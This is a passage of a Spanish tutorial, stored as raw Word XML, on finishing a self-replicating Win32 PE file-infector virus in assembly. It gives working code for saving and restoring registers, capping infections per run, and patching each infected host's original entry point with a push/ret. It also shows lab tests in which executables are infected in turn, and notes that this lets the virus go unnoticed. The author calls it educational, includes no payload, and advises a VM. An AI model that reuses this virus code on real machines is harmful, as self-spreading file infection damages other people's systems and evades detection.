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png" ContentType="image/png"/>
  <Override PartName="/word/media/image13.png" ContentType="image/png"/>
  <Override PartName="/word/media/image9.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uto" w:line="360"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Capítulo 14</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Terminando la infección y algunas consideraciones finales</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bien, acá llegamos ya al final de este tutorial y a la terminación de nuestro primer especíme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n el capítulo anterior ya dejamos todo casi listo y sólo nos queda hacer algunos ajustes finales y por último pasarle el control al host original para que continúe su ejecución norm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ntes que nada vamos a ver dos instrucciones que van a proteger la ejecución normal del host y que básicamente lo que hacen es guardar los registros originales y los flags para luego volverlos a su estado original luego de la ejecución de nuestro viru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stas instrucciones so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b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PUSHAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sta instrucción guarda el contenido de los registros en la pila (stack) en un orden determinado, esto equivale a hacer un push EAX, push ECX, push EDX, push EBX, push ESP, push EBP, push ESI, push EDI.</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b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PUSHFD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: esta instrucción guarda el contenido del registro de Flags en la pila (stack).</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uego, cuando terminemos nuestro código repararemos todo utilizando POPAD y POPFD, que básicamente restauran los valores almacenados en la pila en los registros correspondientes. De esta forma protegeremos la ejecución del host orig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Vamos a gregar estas dos funciones y para eso vamos a tener que ajustar un poco el código. Primeramente nos posicionamos en el inicio de nuestro código, inmediatamente luego de la etiqueta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>iniciovir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y antes del cálculo de delta offse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Simplemente coloca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pushad</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pushfd</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esto nos moverá el puntero de la pila y tendremos que ajustar la rutina que busca la dirección del kernel32, recordemos que nosotros lo habíamos creado dentro de una subrutina y la llamábamos co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all    obtenerK32</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bien, vamos a la rutina y vemos que sacamos un valor del stack, pero antes le sumábamos 0Ch por la llamada a dicha rutina (esto lo pueden ver en el capítulo 6).</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     eax, dword ptr ds:[esp + 0Ch]        ; saca de la pila el ret del CreateProcess  ---------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Agreguemos el pushad y el pushfd al inicio del programa, compilémoslo y veámoslo dentro del OllyDbg.</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jecutemos el programa con F7 para que ingrese en las rutinas, la que a nosotros nos interesa es la búsqueda del kernel32, que es la sigu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676140" cy="111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2" r="-8" b="-32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4676140" cy="111442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l ingresar a la misma vemos que en un momento recupera el valor del stack (+0Ch por el cal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047365" cy="781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46" r="-12" b="-46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3047365" cy="78105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vayamos a la pila y veamos que pasó con la dirección de retorno de la función del kernel32:</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704590" cy="1323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7" r="-10" b="-27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3704590" cy="13239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ara ver la dirección como desplazamiento hacemos doble click sobre la barra izquierda (dirección) y vemos que se ha desplazado 30h lugares, esto es po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0Ch: por el call</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20h: por el pushad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>04h: por el pushfd</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O sea que si sumamos todos estos valores tendremos 030h que es el desplazamiento que vemos en el OllyDbg. Para solucionar esto simplemente modificamos la instrucción anterior dejándola así:</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ax, dword ptr ds:[esp + 030h]        ; saca de la pila el ret del CreateProcess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ya tenemos los valores guardados, ahora lo que vamos a hacer es restaurarlos al terminar la inección, para eso ubicamos la etiqueta volverHost que por ahora solamente tiene un jmp host, pero que luego modificaremos y le agregamos una comprobación para que nos funcione en la primera infección y luego las dos instrucciones de recuperación de registr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mp   ebp, 0h                    ; verificamos si es la primera infección</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je      hos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popfd</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popad</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l comparar ebp con cero lo que estamos haciendo es comparar el Delta Offset, que únicamente valdrá cero en la primera infección, si es este el caso saltamos al mensaje orig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on respecto a las instrucciones de recuperación de valores de la pila, recuerden que van en orden inverso al push por la estructura de la pila donde lo último en ingresar es lo primero en salir (LIFO: Last In First Ou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greguemos estas dos instrucciones, compilemos y vamos al OllyDbg a ver como funciona to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ntes que nada veamos el valor de los registros y de los flag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2713990" cy="1695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1" r="-13" b="-21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2713990" cy="169545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Además controlemos el stack para ver que antes de devolverle el control al host quede todo como ant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704590" cy="2533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4" r="-10" b="-14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3704590" cy="253365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ahora pongamos un BP justo antes de saltar la host orig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866515" cy="485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74" r="-9" b="-74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3866515" cy="4857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ejecutemos con F9. Veremos que ha quedado todo como si no hubiéramos ejecutado nada. Esto es muy importante ya que si queremos pasar desapercibidos tenemos que ser muy cuidadosos con los valores que alteramos, sobre todo el stack que debe quedar correctamente balance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lgo que comentamos en el capítulo 9 fue el límite a la cantidad de infeciones que queremos realizar por cada ejecución, y habíamos creado una variable en nuestro código llamada maxInfecciones. Ahora tenemos que modificar nuestro código para que respete este tope, para eso nos vamos a la rutina de infección, justo después de comprobar que el archivo es “infectable” (las 5 comprobaciones que vimos en el capítulo 11) e incrementamos el contador de infecion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inc       [ebp + offset archivosInfec]                            ; incrementa el contador</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uego tenemos que controlar que no nos pasemos de este contador, esto lo tenemos que realizar antes de llamar nuevamente a la rutina de infección, esto lo colocamos en la parte inicial del código donde buscábamos el siguiente archivo a infectar, luego de la etiqueta 'buscaVictima’ y justo antes de llamar a la rutina de infec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t>buscaVictim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lea     </w:t>
        <w:tab/>
        <w:t>edx, [ebp + offset win32_find_dat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w:t>
        <w:tab/>
        <w:t>ebx, [ebp + offset handleBusq]</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push    </w:t>
        <w:tab/>
        <w:t>edx</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push    </w:t>
        <w:tab/>
        <w:t>ebx</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call    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">[ebp + offset zFindNext] </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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cmp     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">eax, 0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je      </w:t>
        <w:tab/>
        <w:t>volverHos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b/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cmp          [ebp + offset archivosInfec], maxInfecciones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana" w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>jg              volverHost                                      ; si llegamos al limite, salimos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>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call    </w:t>
        <w:tab/>
        <w:t>infectar</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jmp      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">buscaVictima                    </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Ojo, sólo agregamos las dos línes resaltadas en negrit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Ya estamos dejando todo listo, lo que nos queda ahora es modificar el código del archivo infectado para que una vez que termine de realizar el trabajo del virus pueda seguir ejecutándose normalmente. Además tenemos que devolverle el control al host original, que hasta ahora simplemente hacíamos  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>jmp host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> porque estamos en la primer infección. Ojo porque esto es importante que quede claro y que se entienda bie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ensemos por un momento que esta infección ya está ejecutándose desde otro archivo, donde nuestra ubicación dentro del host solo la conocemos gracias al delta offset y alteramos su ejecución con la modificación del entry point original para que apunte a nuestro viru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Ahora bien, en el capítulo 12 vimos que antes de modificar el OEP (Original Entry Point) lo guardábamos en una variable que llamamos entryPoinOrig. Justamente esa variable vamos a utilizar para devolverle el control al host orig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Hay varias formas de realizar esto, yo elegí esta porque me parece sencilla y elegante, pero pueden desarrollar sus propias rutina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o que haremos será simular el siguiente código:</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push      word [address_of_original_entry_poin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ret</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Recordemos el funcionamiento de la pila en las llamadas a subrutinas (capítulo 3), al hacer un ret el SO toma el valor que se encuentra en la parte superior del stack y lo coloca en el resgistro EIP para seguir la ejecución desde ese punto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En realidad no lo vamos a escribir directamente, vamos a colocar los opcodes. Esto lo debemos colocar justo después del popfd y del popad (además debemos sacar la instrucción </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>jmp host)</w:t>
      </w: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Recordemos que durante la compilación no tenemos el valor del OEP, asi que por ahora dejamos el valor en 0. Nos quedaría así:</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b     68h,0,0,0,0               ; simula un push word [address_of_original_entry_poin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ret                                     ; regresamos al host</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ntes que nada, comprobamos si estamos en la primera infección, en cuyo caso saltamos al mensaje original, luego armamos la estructura del push / ret y queda de esta forma ya que el opcode del push es justamente 068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solo nos queda modificar estos ceros en cada programa que infectemos para que en cada caso guarde los OEP’s correspondientes, para eso nos vamos a la rutina de infección justo después de que copiáramos nuestro virus y que lo marcáramos como “infectado”, y antes de desmapear de memoria al archivo que estamos infectan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llí colocamos lo sigu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     ebx, [ebp + offset hostPE]           ; ebx = offset de la cabecera PE del hos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bx, [ebx + 034h]                       ; ebx = ImageBase del hos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ax, [ebp + offset entryPoinOrig]  ; recuperamos el entry point original</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add      eax, ebx                                      ; le sumamos la base ya que es una RV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mov     edi,  [ebp + offset UltimaSeccPE]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lea       ecx, [offset volverHost + 12]</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sub      ecx, offset iniciovi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add      edi, ecx</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dword ptr [edi], eax                    ; simulamos un jmp al entry point orig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xpliquemos esto un poco. Es muy importante que nos olvidemos por un momento de la ejecución actual y pensemos como será la futura ejecución del host que estamos infectando, lo primero que hacemos es recuperar la ImageBase del host para luego poder corregir las RVAs del mismo (por eso buscamos su ImageBas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uego recuperamos en eax la dirección del OEP y la normalizamos, y ya nos queda lista para luego hacer el salto correctamente a través del push / ret que vimos ant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debemos ubicar los ceros que dejamos anteriormente para que nos quede armado el push correctamente, teniendo en mente que lo que vamos a modificar es el archivo que tenemos mapeado en memori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Primero cargamos en edi el valor donde comienza el virus (UltimaSeccPE), luego cargamos en ecx la dirección de la etiqueta volverHost más 012h para no pisar el código que ya tenemos ahí (+2 por el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, +7 por el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>je</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, +1 por el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>popfd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, +1 por el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>popad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y +1 por el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>opcode 068h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>). Por último restamos la dirección de inicio del virus (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sub  ecx, offset iniciovir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) y así nos queda solamente el desplazamiento de esta etiqueta (direc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amos a tratar de explicar esto gráficamente para que se entienda bien el concepto ya puede resultar un poco confus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object w:dxaOrig="10718" w:dyaOrig="6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5.15pt;height:279.5pt" filled="f" o:ole="">
            <v:imagedata r:id="rId9" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="" ShapeID="ole_rId8" DrawAspect="Content" ObjectID="_1013745799" r:id="rId8"/>
        </w:objec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Otra alternativa que podríamos haber utilizado es cambiar la dirección del OEP directamente en el código en ejecución y luego copiar el virus para que ya vaya listo, esto lo tendríamos que hacer igualmente para cada archivo a infectar ya que cada uno tendrá su propio OEP.</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ya que terminamos por fin el código de nuestro virus, vamos a hacer algunas experimentos. Para probar este especímen en particular yo me creé un directorio llamado ‘Laboratorio’ y dentro del mismo hice un subdirectorio llamado ‘bak’ donde coloqué varias copias limpias del programa básico que muestra un mensaje en pantall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Dentro de ‘Laboratorio’ coloqué la muestra del virus y un archivo llamado restaurador.bat (archivo de lotes) muy sencillo que me restaura el laboratorio y me lo deja listo para una nueva sesión, tiene sólo un simple coman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t>copy C:\ Virus\bak\*.*</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2694" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Esto puede parecer muy elemental, pero tiene la ventaja que si hacemos doble click sobre este archivo deja todo listo para una próxima prueb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Hay que aclarar que esto sólo sirve para este caso donde el virus es muy sencillo y donde sabemos exactamente qué hace, pero si estamos realizando un virus más complejo, que recorre la estructura de directorios, o tiene un payload dañino, debemos ser muy cuidadosos y en ese caso lo más recomendable es trabajar directamente en un entorno virtualizado (con VMWare, Microsoft Virtual PC, Oracle VirtualBox, etc.) y desconectado de red.</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Una aclaración, el payload de un virus es cualquier acción que lleve a cabo el mismo, además de su propia propagación, en nuestro caso no tenemos ningún payload ya que no es la finalidad de este tutori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Bien, ya tenemos nuestro laboratorio, ahora realicemos algunas pruebas. Yo tengo 7 copias del programa básico más el virus. Es fácil detectar los archivos infectados ya que los mismo aumentan de tamaño.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Ejecutamos el virus una vez y observamos lo sigu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349625" cy="1740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5" r="-8" b="-15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3349625" cy="174053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Vemos que efectivamente los tres primeros archivos fueron infectados, ya que su tamaño aumentó de 3 Kb a 5Kb. Justamente 3 fue el límite que le impusimos dentro del códig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Ahora ejecutemos uno de estos nuevos archivos infectados, por ejemplo ‘asm001.exe’. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vemos que infecta los tres archivos siguient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813175" cy="20104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15" r="-8" b="-15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3813175" cy="201041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t>Si lo ejecutamos una vez más vemos que termina de infectar el último (asm007.exe) y listo, de ahí en más no hace nada ya que todos los archivos están infectados y marcados como tal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Bien ahora comparemos el archivo que quedó limpio (asm007.exe) con uno infectado (asm001.exe), para eso vamos a utilizar la herramienta que vimos en el capítulo 4, PE-Tools. La ejecutamos y seleccionamos dentro del menú superior la opción ‘Tools -&gt; PE Edito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1642745" cy="150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9" t="-20" r="-19" b="-20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1642745" cy="150812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Abrimos el archivo asm007.exe (limpio) y luego presionamos la opción ‘Compare’ y seleccionamos el archivo asm001.exe (infectado). Esto básicamente va a comparar las cabeceras de ambos archivos, no su contenido.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 continuación muestra las diferencias entre ambos marcadas con una X:</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646805" cy="22580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12" r="-8" b="-12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3646805" cy="225806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t>Si las recorremos todas tendre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tbl>
      <w:tblPr>
        <w:tblW w:w="8472" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="279" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3348"/>
        <w:gridCol w:w="2572"/>
        <w:gridCol w:w="2552"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="470" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="33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620" w:leader="none"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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620" w:leader="none"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>asm007 (limpio)</w:t>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620" w:leader="none"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>asm001 (infectado)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="406"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File Size</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A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1200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="42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Address Of Entry Point</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1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3200</w:t>
            </w:r>
          </w:p>
